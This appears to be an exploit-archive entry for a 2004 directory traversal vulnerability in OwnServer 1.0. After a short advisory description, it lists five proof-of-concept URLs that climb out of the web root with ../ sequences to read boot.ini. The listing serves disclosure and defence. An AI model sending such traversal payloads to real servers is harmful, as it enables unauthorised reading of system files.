anteco visual technologies ownserver 1.0 - Directory Traversal



EKU-ID: 29000 CVE: CVE-2004-2745;OSVDB-43121 OSVDB-ID:
Author: Rafel Ivgi The-Insider Published: 2004-01-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/9461/info

A vulnerability in OwnServer 1.0 and earlier has been reported that may allow a remote attacker to view files residing outside of the web server root directory on the affected system.

http://www.example.com/../../boot.ini
http://www.example.com/../../../boot.ini
http://www.example.com/../../../../boot.ini
http://www.example.com/../../../../../boot.ini
http://www.example.com/../../../../../../boot.ini